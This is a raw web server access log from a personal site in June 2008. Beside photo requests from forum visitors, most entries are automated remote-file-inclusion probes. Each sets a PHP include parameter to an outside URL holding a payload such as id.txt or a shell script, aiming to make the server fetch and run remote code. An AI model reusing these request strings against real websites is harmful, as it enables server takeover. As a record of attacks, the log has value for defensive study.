96.229.195.95 - - [08/Jun/2008:12:06:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:44 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:44 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
200.53.114.42 - - [08/Jun/2008:12:06:44 -0700] "GET /logs//include.php?path[docroot]=http://www.symbols-larp.com/php/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:44 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:44 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:44 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:44 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:44 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:45 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:45 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:45 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:45 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:45 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 200 96561 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:45 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:45 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 200 94524 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:46 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
200.53.114.42 - - [08/Jun/2008:12:07:00 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://www.symbols-larp.com/php/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:12:07:02 -0700] "GET /drop HTTP/1.1" 401 395 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - dmulk [08/Jun/2008:12:07:02 -0700] "GET /drop HTTP/1.1" 301 89 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - dmulk [08/Jun/2008:12:07:03 -0700] "GET /drop/ HTTP/1.1" 200 655 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - dmulk [08/Jun/2008:12:07:08 -0700] "GET / HTTP/1.1" 200 16685 "http://www.dmulk.com/drop/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - dmulk [08/Jun/2008:12:07:08 -0700] "GET / HTTP/1.1" 200 16685 "http://www.dmulk.com/drop/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:12:07:08 -0700] "GET /blog/wp-content/uploads/2008/04/crestoc07-3.jpg HTTP/1.1" 200 51084 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - - [08/Jun/2008:12:07:10 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&373 HTTP/1.1" 200 6289 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
72.199.235.196 - dmulk [08/Jun/2008:12:07:12 -0700] "GET / HTTP/1.1" 200 16685 "http://www.dmulk.com/drop/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:12:07:14 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&624 HTTP/1.1" 200 6289 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
194.208.144.81 - - [08/Jun/2008:12:07:16 -0700] "GET /logs/access_080106.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.253.104.19 - - [08/Jun/2008:12:07:33 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.253.104.19 - - [08/Jun/2008:12:07:37 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.101.24 - - [08/Jun/2008:12:07:42 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [08/Jun/2008:12:07:43 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
90.158.114.6 - - [08/Jun/2008:12:08:00 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
90.158.114.6 - - [08/Jun/2008:12:08:01 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
202.174.80.161 - - [08/Jun/2008:12:08:10 -0700] "GET /logs/access_080131.log/index.php?p=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.80.161 - - [08/Jun/2008:12:08:12 -0700] "GET /index.php?p=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 200 16839 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.80.161 - - [08/Jun/2008:12:08:12 -0700] "GET /logs/index.php?p=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:12:08:22 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:12:08:23 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:12:08:31 -0700] "GET /file.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:12:08:31 -0700] "GET /logs/file.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
80.93.59.63 - - [08/Jun/2008:12:08:33 -0700] "GET /news/example.php?site=http://www.geocities.com/sally_liewberry002/OloBaHCr57shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:12:08:51 -0700] "GET /logs/access_080429.log/skin/zero_vote/ask_password.php?dir=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.174.65.190 - - [08/Jun/2008:12:09:18 -0700] "GET //mambots/content/multithumb/configuration.php?mosConfig_absolute_path=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
24.121.229.193 - - [08/Jun/2008:12:09:18 -0700] "GET /bikes/dteel/2008-05-30/IMG_4646M.JPG HTTP/1.1" 200 64790 "http://www.st-owners.com/forums/showthread.php?t=32353&page=6" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
81.174.65.190 - - [08/Jun/2008:12:09:20 -0700] "GET /logs//mambots/content/multithumb/configuration.php?mosConfig_absolute_path=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:12:09:22 -0700] "GET /drop HTTP/1.1" 401 395 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.1)" "www.dmulk.com"
81.174.65.190 - - [08/Jun/2008:12:09:26 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/configuration.php?mosConfig_absolute_path=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:12:09:28 -0700] "GET /drop/stoc HTTP/1.1" 401 395 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.1)" "www.dmulk.com"
202.174.80.161 - - [08/Jun/2008:12:09:43 -0700] "GET /logs/access_080217.log/index.php?p=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.71.170.173 - - [08/Jun/2008:12:10:35 -0700] "GET /logs/access.log/senetman/html/index.php?page=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [08/Jun/2008:12:10:35 -0700] "GET /senetman/html/index.php?page=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [08/Jun/2008:12:10:35 -0700] "GET /logs/senetman/html/index.php?page=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.49.157 - - [08/Jun/2008:12:10:35 -0700] "GET /shop.php?x=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:12:10:50 -0700] "GET /logs/access_080218.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:12:10:51 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:12:10:52 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.232.94.122 - - [08/Jun/2008:12:11:16 -0700] "GET /logs/access_080308.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.94.122 - - [08/Jun/2008:12:11:16 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.94.122 - - [08/Jun/2008:12:11:17 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:12:11:38 -0700] "GET /logs/access_080429.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.156.192.5 - - [08/Jun/2008:12:11:45 -0700] "GET //tsep.0942/include/colorswitch.php?tsep_config[absPath]=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.182.98 - - [08/Jun/2008:12:11:47 -0700] "GET /logs/[Scripthttp://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [08/Jun/2008:12:11:47 -0700] "GET /[Scripthttp://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.71.170.173 - - [08/Jun/2008:12:11:48 -0700] "GET /logs/access_080308.log/senetman/html/index.php?page=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [08/Jun/2008:12:11:49 -0700] "GET /logs/access_080312.log/[Scripthttp://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [08/Jun/2008:12:11:52 -0700] "GET /logs/access_080219.log/[Scripthttp://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:12:12:03 -0700] "GET /logs/access_080106.log//include/bbs.lib.inc.php?site_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.22.204.167 - - [08/Jun/2008:12:12:10 -0700] "GET /logs/access_080108.log/services.php?page=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.167 - - [08/Jun/2008:12:12:10 -0700] "GET /services.php?page=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.167 - - [08/Jun/2008:12:12:10 -0700] "GET /logs/services.php?page=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.7.198.112 - - [08/Jun/2008:12:12:17 -0700] "GET /logs/access_080312.log//config.php?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.198.112 - - [08/Jun/2008:12:12:17 -0700] "GET //config.php?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.198.112 - - [08/Jun/2008:12:12:18 -0700] "GET /logs//config.php?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.22.204.167 - - [08/Jun/2008:12:12:21 -0700] "GET /logs/access_080213.log/services.php?page=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:12:12:24 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.223.116.60 - - [08/Jun/2008:12:12:38 -0700] "GET /logs/access_080219.log/[Scripthttp://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.223.116.60 - - [08/Jun/2008:12:12:38 -0700] "GET /[Scripthttp://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.223.116.60 - - [08/Jun/2008:12:12:38 -0700] "GET /logs/[Scripthttp://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:12:12:40 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:12:12:40 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:12:12:41 -0700] "GET /logs/access_080105.log/print.php?page=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:12:12:42 -0700] "GET /print.php?page=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:12:12:42 -0700] "GET /logs/print.php?page=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.223.116.60 - - [08/Jun/2008:12:12:46 -0700] "GET /logs/access_080312.log/[Scripthttp://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.71.170.173 - - [08/Jun/2008:12:13:03 -0700] "GET /logs/access_080113.log//admin.php?include_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [08/Jun/2008:12:13:03 -0700] "GET //admin.php?include_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [08/Jun/2008:12:13:03 -0700] "GET /logs//admin.php?include_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [08/Jun/2008:12:13:08 -0700] "GET /logs/access_080123.log//admin.php?include_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.241.229.91 - - [08/Jun/2008:12:13:28 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "ia_archiver-web.archive.org" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:12:13:29 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:12:13:30 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.190.212.202 - - [08/Jun/2008:12:13:33 -0700] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.140.19.142 - - [08/Jun/2008:12:13:40 -0700] "GET /logs/access_080220.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [08/Jun/2008:12:13:41 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [08/Jun/2008:12:13:41 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [08/Jun/2008:12:13:49 -0700] "GET /logs/access_080220.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [08/Jun/2008:12:13:49 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [08/Jun/2008:12:13:50 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [08/Jun/2008:12:13:51 -0700] "GET /logs/access_080312.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [08/Jun/2008:12:13:57 -0700] "GET /logs/access_080312.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.93.59.63 - - [08/Jun/2008:12:13:59 -0700] "GET /logs/access_080507.log/news/example.php?site=http://www.geocities.com/sally_liewberry002/OloBaHCr57shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.59.63 - - [08/Jun/2008:12:14:00 -0700] "GET /logs/news/example.php?site=http://www.geocities.com/sally_liewberry002/OloBaHCr57shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:14:28 -0700] "GET /logs/str.php?lang=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:14:28 -0700] "GET /str.php?lang=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.71.170.173 - - [08/Jun/2008:12:15:00 -0700] "GET /logs/access_080308.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [08/Jun/2008:12:15:00 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [08/Jun/2008:12:15:00 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.253.104.19 - - [08/Jun/2008:12:15:49 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.94.122 - - [08/Jun/2008:12:15:55 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.94.122 - - [08/Jun/2008:12:15:59 -0700] "GET /logs/access_080113.log//admin.php?include_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.94.122 - - [08/Jun/2008:12:15:59 -0700] "GET //admin.php?include_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.94.122 - - [08/Jun/2008:12:15:59 -0700] "GET /logs//admin.php?include_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.94.122 - - [08/Jun/2008:12:16:01 -0700] "GET /logs/access_080123.log//admin.php?include_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
